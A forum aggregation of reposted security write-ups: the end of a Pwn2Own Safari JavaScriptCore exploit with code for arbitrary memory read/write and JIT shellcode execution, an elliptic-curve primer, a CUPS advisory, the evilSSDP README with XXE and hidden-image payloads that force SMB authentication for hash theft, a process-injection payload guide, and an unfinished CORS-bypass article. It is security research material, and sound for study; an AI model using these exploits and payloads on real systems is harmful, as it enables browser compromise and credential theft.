oob_target[0] = x; // [A] return Int64.fromDouble(oob_array[oob_target_index]); // [B] } By doing the reverse, we can establish our fakeobj(...) primitive. This was achieved by using our relative R/W (oob_array) to write a given address into the oob_target array butterfly (as a float) [C]. Reading that array index from JavaScript will return a JSObject for the pointer we stored [D]: // Return a JSObject at a given address prims.fakeobj = function(addr) { oob_array[oob_target_index] = addr.asDouble(); // [C] return oob_target[0]; // [D] } Using our relative R/W primitive, we have created some higher level generic exploit primitives that will help us in creating fake JavaScript objects. It is almost as if we have extended the JavaScript engine with new features! Next, we will demonstrate how these two new primitives can be used to help build a fake TypedArray object. This is what will lead us to achieve a true arbitrary R/W primitive. Arbitrary R/W Primitive Our process of creating a fake TypedArray is taken directly from the techniques shared in the phrack article previously referenced in this post. To be comprehensive, we discuss our use of these methods. To simplify the process of creating a fake TypedArray, we constructed it ‘inside’ a standard JSObject. The ‘container’ object we created was of the form: let utarget = new Uint8Array(0x10000); utarget[0] = 0x41; // Our fake array // Structure id guess is 0x200 // [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)] let jscell = new Int64('0x0118270000000200'); // Construct the object // Each attribute will set 8 bytes of the fake object inline obj = { // JSCell 'a': jscell.asDouble(), // Butterfly can be anything (unused) 'b': false, // Target we want to write to (the 'backing store' field) 'c': utarget, // Length and flags 'd': new Int64('0x0001000000000010').asDouble() }; Using a JSObject in this way makes it easy for us to set or modify any of the objects contents at will. For example, we can easily point the ‘backing store’ (our arbitrary R/W) at any JS object by placing it in the ‘BackingStore’ mock field. Of these items, the JSCell is the most complex to fake. Specifically, the structureID field of JSCells is problematic. At runtime, JSC generates a unique structureID for each class of JavaScript objects. This ID is used by the engine to determine the object type, how it should be handled, and all of its attributes. At runtime, we don’t know what the structureID is for a TypedArray. To get around this issue, we need some way to help ensure that we can “guess” a valid structureID for the type of object we want. Due to some low-level concepts inherent to JavaScriptCore, if we create a TypedArray object, then add at least one custom attribute to it, JavaScriptCore will assign it a unique structureID. We abused this fact to ‘spray’ these ids, making it fairly likely that we could reliably guess an id (say, 0x200) that corresponded to a TypedArray. // Here we will spray structure IDs for Float64Arrays // See http://www.phrack.org/papers/attacking_javascript_engines.html function sprayStructures() { function randomString() { return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5); } // Spray arrays for structure id for (let i = 0; i < 0x1000; i++) { let a = new Float64Array(1); // Add a new property to create a new Structure instance. a[randomString()] = 1337; structs.push(a); } } After spraying a large number of TypedArray IDs, we created a fake TypedArray and guessed a reasonable value for its structureID. We can safely ‘check’ if we guessed correctly by calling instanceOf on the fake TypedArray object. If instanceof returned Float64Array, we knew we had created a ‘valid-enough’ TypedArray object! At this point, we have access to a fake TypedArray from JavaScript, while simultaneously having control over its backing store pointer through utarget. Manipulating the backing store pointer of this TypedArray grants us full read-write access to the entire address space of the process. // Set data at a given address prims.set = function(addr, arr) { fakearray[2] = addr.asDouble(); utarget.set(arr); } // Read 8 bytes as an Int64 at a given address prims.read64 = function(addr) { fakearray[2] = addr.asDouble(); let bytes = Array(8); for (let i=0; i<8; i++) { bytes[i] = utarget[i]; } return new Int64(bytes); } // Write an Int64 as 8 bytes at a given address prims.write64 = function(addr, value) { fakearray[2] = addr.asDouble(); utarget.set(value.bytes); } With our arbitrary R/W capability in hand, we can work towards our final goal: arbitrary code execution. Arbitrary Code Execution On MacOS, Safari/JavaScriptCore still uses Read/Write/Execute (RWX) JIT pages. To achieve code execution, we can simply locate one of these RWX JIT pages and overwrite it with our own shellcode. The first step is to find a pointer to one of these JIT pages. To do this, we created a JavaScript function object and used it a few times. This ensures the function object would have its logic compiled down to machine code, and assigned a region in the RWX JIT pages: // Build an arbitrary JIT function // This was basically just random junk to make the JIT function larger let jit = function(x) { var j = []; j[0] = 0x6323634; return x*5 + x - x*x /0x2342513426 +(x-x+0x85720642*(x+3-x / x+0x41424344)/0x41424344)+j[0]; }; // Make sure the JIT function has been compiled jit(); jit(); jit(); ... We then used our arbitrary R/W primitive and addrof(...) to inspect the function object jit. Traditionally, the object’s RWX JIT page pointer can be found somewhere within the function object. In early January, a ‘pointer poisoning’ patch was introduced into JavaScriptCore to mitigate the Spectre CPU side-channel issues. This was not designed to hide pointers from an attacker with arbitrary R/W, but we are now required to dig a bit deeper through the object for an un-poisoned JIT pointer. // Traverse the JSFunction object to retrieve a non-poisoned pointer log("Finding jitpage"); let jitaddr = prims.read64( prims.read64( prims.read64( prims.read64( prims.addrof(jit).add(3*8) ).add(3*8) ).add(3*8) ).add(5*8) ); log("Jit page addr = "+jitaddr); ... Now that we have a pointer to a RWX JIT page, we can simply plug it into the backing store field of our fake TypedArray and write to it (arbitrary write). The final caveat we have to be mindful of is the size of our shellcode payload. If we copy too much code, we may inadvertently ‘smash’ through other JIT’d functions with our arbitrary write, introducing undesirable instability. shellcode = [0xcc, 0xcc, 0xcc, 0xcc] // Overwrite the JIT code with our INT3s log("Writing shellcode over jit page"); prims.set(jitaddr.add(32), shellcode); ... To gain code execution, we simply call the corresponding function object from JavaScript. // Call the JIT function to execute our shellcode log("Calling jit function"); jit(); Running the full exploit against JSC release, we can see that our Trace / Breakpoint (cc shellcode) is being executed. This implies we have achieved arbitrary code execution. The final exploit demonstrating arbitrary code execution against a release build of JavaScriptCore on Ubuntu 16.04 Having completed the exploit, with a little more work an attacker could embed this JavaScript in any website to pop vulnerable versions of Safari. Given more research & development time, this vulnerability could probably be exploited with a >99% success rate. The last step involves wrapping this JavaScript based exploit in HTML, and tuning timing and figures slightly such that it works more reliably when targeting Apple Safari running on real Mac hardware. A victim could experience complete compromise of their browser by simply clicking the wrong link, or navigating to a malicious website. Conclusion With little prior knowledge of JavaScriptCore, this vulnerability took approximately 100 man-hours to study, weaponize, and stabilize from discovery. In our testing leading up to Pwn2Own 2018, we measured the success rate of our Safari exploit at approximately 95% across 1000+ runs on a 13 inch, i5, 2017 MacBook Pro that we bought for testing. At Pwn2Own 2018, the JSC exploit landed successfully against a 13 inch, i7, 2017 MacBook Pro on three of four attempts, with the race condition failing entirely on the second attempt (possibly exacerbated by the i7). The next step in the zero-day chain is escaping the Safari sandbox to compromise the entire machine. In the next post, we will discuss our process of evaluating the sandbox to identify a vulnerability that led to a root level privilege escalation against the system. Sursa: https://blog.ret2.io/2018/07/11/pwn2own-2018-jsc-exploit/
      • 1
      • Upvote
  18. Introducing Elliptic Curves Posted on February 8, 2014 by j2kun With all the recent revelations of government spying and backdoors into cryptographic standards, I am starting to disagree with the argument that you should never roll your own cryptography. Of course there are massive pitfalls and very few people actually need home-brewed cryptography, but history has made it clear that blindly accepting the word of the experts is not an acceptable course of action. What we really need is more understanding of cryptography, and implementing the algorithms yourself is the best way to do that. [1] For example, the crypto community is quickly moving away from the RSA standard (which we covered in this blog post). Why? It turns out that people are getting just good enough at factoring integers that secure key sizes are getting too big to be efficient. Many experts have been calling for the security industry to switch to Elliptic Curve Cryptography (ECC), because, as we’ll see, the problem appears to be more complex and hence achieves higher security with smaller keys. Considering the known backdoors placed by the NSA into certain ECC standards, elliptic curve cryptography is a hot contemporary issue. If nothing else, understanding elliptic curves allows one to understand the existing backdoor. I’ve seen some elliptic curve primers floating around with all the recent talk of cryptography, but very few of them seem to give an adequate technical description [2], and legible implementations designed to explain ECC algorithms aren’t easy to find (I haven’t found any). So in this series of posts we’re going to get knee deep in a mess of elliptic curves and write a full implementation. If you want motivation for elliptic curves, or if you want to understand how to implement your own ECC, or you want to understand the nuts and bolts of an existing implementation, or you want to know some of the major open problems in the theory of elliptic curves, this series is for you. The series will have the following parts: Elliptic curves as elementary equations The algebraic structure of elliptic curves Points on elliptic curves as Python objects Elliptic curves over finite fields Finite fields primer (just mathematics) Programming with finite fields Back to elliptic curves Diffie-Hellman key exchange Shamir-Massey-Omura encryption and Digital Signatures Along the way we’ll survey a host of mathematical topics as needed, including group theory, projective geometry, and the theory of cryptographic security. We won’t assume any familiarity with these topics ahead of time, but we do intend to develop some maturity through the post without giving full courses on the side-topics. When appropriate, we’ll refer to the relevant parts of the many primers this blog offers. A list of the posts in the series (as they are published) can be found on the Main Content page. And as usual all programs produced in the making of this series will be available on this blog’s Github page. For anyone looking for deeper mathematical information about elliptic curves (more than just cryptography), you should check out the standard book, The Arithmetic of Elliptic Curves. [1] Okay, what people usually mean is that you shouldn’t use your own cryptography for things that actually matter, but I think a lot of the warnings are interpreted or extended to, “Don’t bother implementing cryptographic algorithms, just understand them at a fuzzy high level.” I imagine this results in fewer resources for people looking to learn cryptography and the mathematics behind it, and at least it prohibits them from appreciating how much really goes into an industry-strength solution. And this mindset is what made the NSA backdoor so easy: the devil was in the details. ↑ [2] From my heavily biased standpoint as a mathematician. ↑ Sursa: https://jeremykun.com/2014/02/08/introducing-elliptic-curves/
  19. CUPS Local Privilege Escalation and Sandbox Escapes Wednesday, July 11, 2018 at 7:25PM Gotham Digital Science has discovered multiple vulnerabilities in Apple’s CUPS print system affecting macOS 10.13.4 and earlier and multiple Linux distributions. All information in this post has been shared with Apple and other affected vendors prior to publication as part of the coordinated disclosure process. All code is excerpted from Apple’s open source CUPS repository located at https://github.com/apple/cups The vulnerabilities allow for local privilege escalation to root (CVE-2018-4180), multiple sandbox escapes (CVE-2018-4182 and CVE-2018-4183), and unsandboxed root-level local file reads (CVE-2018-4181). A related AppArmor-specific sandbox escape (CVE-2018-6553) was also discovered affecting Linux distributions such as Debian and Ubuntu. When chained together, these vulnerabilities allow an unprivileged local attacker to escalate to unsandboxed root privileges on affected systems. Affected Linux systems include those that allow non-root users to modify cupsd.conf such as Debian and Ubuntu. Redhat and related distributions are generally not vulnerable by default. Consult distribution-specific documentation and security advisories for more information. The vulnerabilities were patched in macOS 10.13.5, and patches are currently available for Debian and Ubuntu systems. GDS would like to thank Apple, Debian, and Canonical for working to patch the vulnerabilities, and CERT for assisting in vendor coordination. Sursa: https://blog.gdssecurity.com/labs/2018/7/11/cups-local-privilege-escalation-and-sandbox-escapes.html
  20. Overview This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this page will load a hidden image over SMB, allowing you to capture or relay the NetNTLM challenge/response. This works against Windows 10 systems (even if they have disabled NETBIOS and LLMNR) and requires no existing credentials to execute. As a bonus, this tool can also detect and exploit potential zero-day vulnerabilities in the XML parsing engines of applications using SSDP/UPNP. To try this, use the 'xxe-smb' template. If a vulnerable device is found, it will alert you in the UI and then mount your SMB share with NO USER INTERACTION required via an XML External Entity (XXE) attack. If you get lucky and find one of those, you can probably snag yourself a nice snazzy CVE (please reference evilSSDP in the disclosure if you do). Demo Video Usage A typical run looks like this: essdp.py eth0 You need to provide the network interface at a minimum. The interface is used for both the UDP SSDP interaction as well as hosting a web server for the XML files and phishing page. The port is used only for the web server and defaults to 8888. The tool will automatically inject an IMG tag into the phishing page using the IP of the interface you provide. To work with hashes, you'll need to launch an SMB server at that interface (like Impacket). This address can be customized with the -s option. You do NOT need to edit the variables in the template files - the tool will do this automatically. You can choose between the included templates in the "templates" folder or build your own simply by duplicating an existing folder and editing the files inside. This allows you to customize the device name, the phishing contents page, or even build a totally new type of UPNP device that I haven't created yet. usage: essdp.py [-h] [-p PORT] [-t TEMPLATE] interface positional arguments: interface Network interface to listen on. optional arguments: -h, --help show this help message and exit -p PORT, --port PORT Port for HTTP server. Defaults to 8888. -t TEMPLATE, --template TEMPLATE Name of a folder in the templates directory. Defaults to "password-vault". This will determine xml and phishing pages used. -s SMB, --smb SMB IP address of your SMB server. Defalts to the primary address of the "interface" provided. Templates The following templates come with the tool. If you have good design skills, please contribute one of your own! bitcoin: Will show up in Windows Explorer as "Bitcoin Wallet". Phishing page is just a random set of Bitcoin private/public/address info. There are no actual funds in these accounts. password-vault: Will show up in Windows Explorer as "IT Password Vault". Phishing page contains a short list of fake passwords / ssh keys / etc. xxe-smb: Will not likely show up in Windows Explorer. Used for finding zero day vulnerabilities in XML parsers. Will trigger an "XXE - VULN" alert in the UI for hits and will attempt to force clients to authenticate with the SMB server, with 0 interaction. xxe-exfil: Another example of searching for XXE vulnerabilities, but this time attempting to exfiltrate a test file from a Windows host. Of course you can customize this to look for whatever specific file you are after, Windows or Linux. In the vulnerable applications I've discovered, exfiltration works only on a file with no whitepace or linebreaks. This is due to how it is injected into the URL of a GET request. If you get this working on multi-line files, PLEASE let me know how you did it. Technical Details Simple Service Discovery Protocol (SSDP) is used by Operating Systems (Windows, MacOS, Linux, IOS, Android, etc) and applications (Spotify, Youtube, etc) to discover shared devices on a local network. It is the foundation for discovering and advertising Universal Plug & Play (UPNP) devices. Devices attempting to discover shared network resources will send a UDP multicast out to 239.255.255.250 on port 1900. The source port is randomized. An example request looks like this: M-SEARCH * HTTP/1.1 Host: 239.255.255.250:1900 ST: upnp:rootdevice Man: "ssdp:discover" MX: 3 To interact with this host, we need to capture both the source port and the 'ST' (Service Type) header. The response MUST be sent to the correct source port and SHOULD include the correct ST header. Note that it is not just the Windows OS looking for devices - scanning a typical network will show a large amount of requests from applications inside the OS (like Spotify), mobile phones, and other media devices. Windows will only play ball if you reply with the correct ST, other sources are more lenient. evilSSDP will extract the requested ST and send a reponse like the following: HTTP/1.1 200 OK CACHE-CONTROL: max-age=1800 DATE: Tue, 26 Jun 2018 01:06:26 GMT EXT: LOCATION: http://192.168.1.131:8888/ssdp/device-desc.xml SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1 ST: upnp:rootdevice USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice BOOTID.UPNP.ORG: 0 CONFIGID.UPNP.ORG: 1 The location IP, ST, and date are constructed dynamically. This tells the requestor where to find more information about our device. Here, we are forcing Windows (and other requestors) to access our 'Device Descriptor' xml file and parse it. The USN is just a random string and needs only to be unique and formatted properly. evilSSDP will pull the 'device.xml' file from the chosen templates folder and dynamically plug in some variables such as your IP address. This 'Device Descriptor' file is where you can customize some juicy-sounding friendly names and descriptions. It looks like this: <root> <specVersion> <major>1</major> <minor>0</minor> </specVersion> <device> <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType> <friendlyName>IT Password Vault</friendlyName> <manufacturer>PasSecure</manufacturer> <manufacturerURL>http://passecure.com</manufacturerURL> <modelDescription>Corporate Password Repository</modelDescription> <modelName>Core</modelName> <modelNumber>1337</modelNumber> <modelURL>http://passsecure.com/1337</modelURL> <serialNumber>1337</serialNumber> <UDN>uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563</UDN> <serviceList> <service> <URLBase>http://$localIp:$localPort</URLBase> <serviceType>urn:ecorp.co:service:ePNP:1</serviceType> <serviceId>urn:epnp.ecorp.co:serviceId:ePNP</serviceId> <controlURL>/epnp</controlURL> <eventSubURL/> <SCPDURL>/service-desc.xml</SCPDURL> </service> </serviceList> <presentationURL>http://$localIp:$localPort/present.html</presentationURL> </device> </root> A key line in this file contains the 'Presentation URL'. This is what will load in a user's browser if they decide to manually double-click on the UPNP device. evilSSDP will host this file automatically (present.html from the chosen template folder), plugging in your source IP address into an IMG tag to access an SMB share that you can host with tools like Impacket, Responder, or Metasploit. The IMG tage looks like this: <img src="file://///$localIp/smb/hash.jpg" style="display: none;" /><br> Zero-Day Hunting By default, this tool essentially forces devices on the network to parse an XML file. A well-known attack against applications that parse XML exists - XML External Entity Processing (XXE). This type of attack against UPNP devices in likely overlooked - simply because the attack method is complex and not readily apparent. However, evilSSDP makes it very easy to test for vulnerable devices on your network. Simply run the tool and look for a big [XXE VULN!!!] in the output. NOTE: using the xxe template will likely not spawn visibile evil devices across the LAN, it is meant only for zero-interaction scenarios. This is accomplished by providing a Device Descriptor XML file with the following content: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" > <!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" > ]> <hello>&xxe;&xxe-url;</hello> When a vulnerable XML parser reads this file, it will automatically mount the SMB share (allowing you to crack the hash or relay) as well as access an HTTP URL to notify you it was discovered. The notification will contain the HTTP headers and an IP address, which should give you some info on the vulnerable application. If you see this, please do contact the vendor to fix the issue. Also, I would love to hear about any zero days you find using the tool. Customization This is an early beta, but constructed in such a way to allow easy template creation in the future. I've included two very basic templates - simply duplicate a template folder and customize for your own use. Then use the '-t' parameter to choose your new template. The tool currently only correctly creates devices for the UPNP 'rootdevice' device type, although it is responding to the SSDP queries for all devices types. If you know UPNP well, you can create a new template with the correct parameters to fufill requests for other device types as well. Thanks Thanks to ZeWarren and his project here. I used this extensively to understand how to get the basics for SSDP working. Also thanks to Microsoft for developing lots of fun insecure things to play with. Sursa: https://gitlab.com/initstring/evil-ssdp
  21. Process Injection: Writing the payload Posted on July 12, 2018 by odzhan Introduction The purpose of this post is to discuss a Position Independent Code (PIC) written in C that will be used for demonstrating process injection on the Windows operating system. The payload will simply execute an instance of the calculator, and is not intended to be malicious in any way. In follow up posts, I’ll discuss a number of injection methods to help the reader understand how they work. Below is a screenshot of the PROPagate method in action, that I’ll hopefully discuss in a follow up post. Function prototypes Most of the injection methods require a PIC to run successfully in a remote process space, unless of course one wants to load a Dynamic-link Library. (DLL) In the case of loading a DLL, one only needs to execute the LoadLibrary API providing the path of a DLL as parameter. Traditionally, PICs have been written in C or assembly, but there are problems when using pure assembly code. Consider that Windows can run on multiple architectures (e.g x86,amd64,arm), with multiple calling conventions (e.g stdcall,fastcall). What if corrections or changes to the code are required? For those reasons, it makes more sense to use a High-level Language (HLL) like C. Some of the methods that will be discussed have individual requirements. Some of the callback functions executed will be passed a number of parameters, and due to calling convention will expect those parameters be removed upon returning to the caller. Thread procedure Creating a new thread in a remote process can be performed using one of the following API. CreateRemoteThread RtlCreateUserThread NtCreateThreadEx ZwCreateThreadEx Each API expects a pointer to a ThreadProc callback function. The following is defined in the Windows SDK. This is also perfect for LoadLibrary that only expects one parameter. DWORD WINAPI ThreadProc( _In_ LPVOID lpParameter); Asynchronous Procedure Call It’s also possible to attach a PIC to an existing thread by using one of the following API. The thread must be alertable for this to work, and there’s no convenient way to determine if a thread is alertable or not. QueueUserAPC NtQueueApcThread NtQueueApcThreadEx ZwQueueApcThread ZwQueueApcThreadEx RtlQueueApcWow64Thread VOID CALLBACK APCProc( _In_ ULONG_PTR dwParam); WindowProc callback function Some of you will know of the Extra Window Memory (EWM) injection method? The well-known method involves replacing the “CTray” object that is used to control the behavior of the “Shell_TrayWnd” class registered by explorer.exe. Some versions of Windows permit updating this object via SetWindowLongPtr, therefore allowing code execution without the creation of a new thread, but more on that later! The following API can be used to update the window’s callback function. SetWindowLong (32-bit) GetWindowLong (32-bit) SetWindowLongPtr (32 and 64-bit) GetWindowLongPtr (32 and 64-bit) LRESULT CALLBACK WindowProc( _In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam); Subclass callback function The PROPagate method, is named after the APIs GetProp and SetProp used to change the address of a callback function for a subclassed window. As of July 2018, this is a relatively new technique that’s similar to the EWM injection or shatter attacks described in 2002. The following API (but not all) may be of interest. GetProp SetProp EnumProps typedef LRESULT ( CALLBACK *SUBCLASSPROC)( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData); Dynamic-link Library (DLL) Although not a PIC, process injection can sometimes involve loading a DLL. Compiling the payload into a DLL is therefore an option. __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved); Compiling To generate the appropriate payload using the correct parameters and return type, we use the define directive. If we need to compile the payload for another function prototype, it would be relatively easy to amend this code. #ifdef XAPC // Asynchronous Procedure Call VOID CALLBACK APCProc(ULONG_PTR dwParam) #endif #ifdef THREAD // Create remote thread DWORD WINAPI ThreadProc(LPVOID lpParameter) #endif #ifdef SUBCLASS // Window subclass callback procedure LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData) #endif #ifdef WINDOW // Window callback procedure LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) #endif #ifdef DLL // compile as Dynamic-link Library #pragma warning( push ) #pragma warning( disable : 4100 ) __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved) #endif What if the payload is called multiple times? For each method discussed, I will address that question. Declaring strings If you declare a string in C, and compile the source into an executable, you might find string literals stored in a read-only section of memory. This is a problem for a PIC because we need all variables, including strings stored on the stack. To illustrate the problem, consider the following simple piece of code. #include <stdio.h> int main(void){ char msg[]="Hello, World!\n"; printf("%s", msg); return 0; } Although this assembly output of the MSVC compiler isn’t very readable, it shows the stack isn’t used for local storage of the string literal. The solution might be declaring the string as a byte array, like the following. #include <stdio.h> int main(void){ char msg[]={'H','e','l','l','o',',',' ','W','o','r','l','d','!','\n',0}; printf("%s", msg); return 0; } The assembly output of this shows MSVC will use the local stack. This works for MSVC, but unfortunately not for GCC that will still store the string in read-only section of the executable. What other options are there? Use inline assembly If I recall correctly, it was Z0MBiE/29a who once suggested in Solving Plain Strings Problem In HLL using macro based assembly with the Borland C compiler to store strings on the stack for the purpose of obfuscation. In Phrack #69, Shellcode the better way, or how to just use your compiler by fishstiqz suggests using an inline macro. #define INLINE_STR(name, str) \ const char * name; \ asm( \ "call 1f\n" \ ".asciz \"" str "\"\n" \ "1:\n" \ "pop %0\n" \ : "=r" (name) \ ); The macro can be used with the following. INLINE_STR(kernel32, "kernel32"); PVOID pKernel32 = scGetModuleBase(kernel32); We’re depending on assembly code here, and that’s precisely what we should avoid. We also can’t inline 64-bit assembly, as fishstiqz points out. What else? Declaration using arrays After examining various options, and having taken the advice of others (@solardiz) declaring strings as 32-bit arrays solves the problem for both GCC and MSVC. #include <stdio.h> typedef unsigned int W; int main(void){ W msg[4]; msg[0]=*(W*)"Hell"; msg[1]=*(W*)"o, W"; msg[2]=*(W*)"orld"; msg[3]=*(W*)"!\n"; printf("%s", (char*)msg); return 0; } As you can see from MSVC and GCC output, both place the string on the stack. MSVC output GCC output Of course, it would make sense to automate this process, rather than try initialize manually 😉 Declaring function pointers You don’t have to declare function pointers in this way, but for a shellcode, it makes the code much easier to read. typedef HANDLE (WINAPI *OpenEvent_t)( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ LPCTSTR lpName); typedef BOOL (WINAPI *SetEvent_t)( _In_ HANDLE hEvent); typedef BOOL (WINAPI *CloseHandle_t)( _In_ HANDLE hOject); typedef UINT (WINAPI *WinExec_t)( _In_ LPCSTR lpCmdLine, _In_ UINT uCmdShow); Once the function is defined, you can declare it inside the main code, like so. SetEvent_t pSetEvent; OpenEvent_t pOpenEvent; CloseHandle_t pCloseHandle; WinExec_t pWinExec; Resolving API addresses Rather than cover the same ground, I recommend reading two posts about this task. Resolving API addresses in memory, and Fido, how it resolves GetProcAddress and LoadLibraryA. These both cover some good ways to resolve API dynamically using the Import Address Table (IAT) and Export Address Tables (EAT) of a Portable Executable (PE) file. Traversing the Process Environment Block (PEB) modules is commonly found in shellcodes, and it’s required for a PIC to resolve address of API functions. // search all modules in the PEB for API LPVOID xGetProcAddress(LPVOID pszAPI) { PPEB peb; PPEB_LDR_DATA ldr; PLDR_DATA_TABLE_ENTRY dte; LPVOID api_adr=NULL; #if defined(_WIN64) peb = (PPEB) __readgsqword(0x60); #else peb = (PPEB) __readfsdword(0x30); #endif ldr = (PPEB_LDR_DATA)peb->Ldr; // for each DLL loaded dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink; for (;dte->DllBase != NULL && api_adr == NULL; dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink) { // search the export table for api api_adr=FindExport(dte->DllBase, (PCHAR)pszAPI); } return api_adr; } Searching the Export Address Table (EAT) One can certainly search the Import Address Table (IAT) for the address of API, but the following uses the Export Addres Table. This function doesn’t handle forward references. Note that we’re also searching by string, instead of hash. // locate address of API in export address table LPVOID FindExport(LPVOID base, PCHAR pszAPI){ PIMAGE_DOS_HEADER dos; PIMAGE_NT_HEADERS nt; DWORD cnt, rva, dll_h; PIMAGE_DATA_DIRECTORY dir; PIMAGE_EXPORT_DIRECTORY exp; PDWORD adr; PDWORD sym; PWORD ord; PCHAR api, dll; LPVOID api_adr=NULL; dos = (PIMAGE_DOS_HEADER)base; nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory; rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; // if no export table, return NULL if (rva==0) return NULL; exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva); cnt = exp->NumberOfNames; // if no api names, return NULL if (cnt==0) return NULL; adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions); sym = RVA2VA(PDWORD,base, exp->AddressOfNames); ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals); dll = RVA2VA(PCHAR, base, exp->Name); do { // calculate hash of api string api = RVA2VA(PCHAR, base, sym[cnt-1]); // add to DLL hash and compare if (!xstrcmp(pszAPI, api)){ // return address of function api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]); return api_adr; } } while (--cnt && api_adr==0); return api_adr; } Summary If we use C instead of assembly, writing a payload isn’t that difficult. The next posts on this subject will cover some injection methods individually. I’ll post source code shortly. Sursa: https://modexp.wordpress.com/2018/07/12/process-injection-writing-payload/
  22. Advanced CORS Exploitation Techniques Posted by Corben Leo on June 16, 2018 Preface I’ve seen some fantastic research done by Linus Särud and by Bo0oM on how Safari’s handling of special characters could be abused. https://labs.detectify.com/2018/04/04/host-headers-safari/ https://lab.wallarm.com/the-good-the-bad-and-the-ugly-of-safari-in-client-side-attacks-56d0cb61275a Both articles dive into practical scenarios where Safari’s behavior can lead to XSS or Cookie Injection. The goal of this post is bring even more creativity and options to the table! Introduction: Last November, I wrote about a tricky cross-origin resource sharing bypass in Yahoo View that abused Safari’s handling of special characters. Since then, I’ve found more bugs using clever bypasses and decided to present more advanced techniques to be used. Note: This assumes you have a basic understanding of what CORS is and how to exploit misconfigurations. Here are some awesome posts to get you caught up: Portswigger’s Post Geekboy’s post Background: DNS & Browsers: Quick Summary: The Domain Name System is essentially an address book for servers. It translates/maps hostnames to IP addresses, making the internet easier to use. When you attempt to visit a URL into a browser: A DNS lookup is performed to convert the host to an IP address ⇾ it initiates a TCP connection to the server ⇾ the server responds with SYN+ACK ⇾ the browser sends an HTTP request to the server to retrieve content ⇾ then renders / displays the content accordingly. If you’re a visual thinker, here is an image of the process. DNS servers respond to arbitrary requests – you can send any characters in a subdomain and it’ll respond as long as the domain has a wildcard DNS record. Example: dig A "<@$&(#+_\`^%~>.withgoogle.com" @1.1.1.1 | grep -A 1 "ANSWER SECTION" Browsers? So we know DNS servers respond to these requests, but how do browsers handle them? Answer: Most browsers validate domain names before making any requests. Examples: Chrome: Firefox: Safari: Notice how I said most browsers validate domain names, not all of them do. Safari is the divergent: if we attempt to load the same domain, it will actually send the request and load the page: We can use all sorts of different characters, even unprintable ones: ,&'";!$^*()+=`~-_=|{}% // non printable chars %01-08,%0b,%0c,%0e,%0f,%10-%1f,%7f Jumping into CORS Configurations Most CORS integrations contain a whitelist of origins that are permitted to read information from an endpoint. This is usually done by using regular expressions. Example #1: ^https?:\/\/(.*\.)?xxe\.sh$ Intent: The intent of implementing a configuration with this regex would be to allow cross-domain access from xxe.sh and any subdomain (http:// or https://) The only way an attacker would be able to steal data from this endpoint, is if they had either an XSS or subdomain takeover on http(s)://xxe.sh / http(s)://*.xxe.sh. Example #2: ^https?:\/\/.*\.?xxe\.sh$ Intent: Same as Example #1 – allow cross-domain access from xxe.sh and any subdomain This regular expression is quite similar to the first example, however it contains a problem that would cause the configuration to be vulnerable to data theft. The problem lies in the following regex: .*\.? Breakdown: .* = any characters except for line terminators \. = a period ? = a quantifier, in this case matches "." either zero or one times. Since .*\. is not in a capturing group (like in the first example), the ? quantifier only affects the . character, therefore any characters are allowed before the string “xxe.sh”, regardless of whether there is a period separating them. This means an attacker could send any origin ending in xxe.sh and would have cross-domain access. This is a pretty common bypass technique – here’s a real example of it: https://hackerone.com/reports/168574 by James Kettle Example #3: ^https?:\/\/(.*\.)?xxe\.sh\:?.* Intent: This would be likely be implemented with the intent to allow cross-domain access from xxe.sh, all subdomains, and from any ports on those domains. Can you spot the problem? Breakdown: \: = Matches the literal character ":" ? = a quantifier, in this case matches ":" either zero or one times. .* = any characters except for line terminators Just like in the second example, the ? quantifier only affects the : character. So if we send an origin with other characters after xxe.sh, it will still be accepted. The Million Dollar Question: How does Safari’s handling of special characters come into play when exploiting CORS Misconfigurations? Take the following Apache configuration for example: SetEnvIf Origin "^https?:\/\/(.*\.)?xxe.sh([^\.\-a-zA-Z0-9]+.*)?" AccessControlAllowOrigin=$0 Header set Access-Control-Allow-Origin %{AccessControlAllowOrigin}e env=AccessControlAllowOrigin This would be likely be implemented with the intent of cross-domain access from xxe.sh, all subdomains, and from any ports on those domains. Here’s a breakdown of the regular expression: [^\.\-a-zA-Z0-9] = does not match these characters: "." "-" "a-z" "A-Z" "0-9" + = a quantifier, matches above chars one or unlimited times (greedy) .* = any character(s) except for line terminators This API won’t give access to domains like the ones in the previous examples and other common bypass techniques won’t work. A subdomain takeover or an XSS on *.xxe.sh would allow an attacker to steal data, but let’s get more creative! We know any origin as 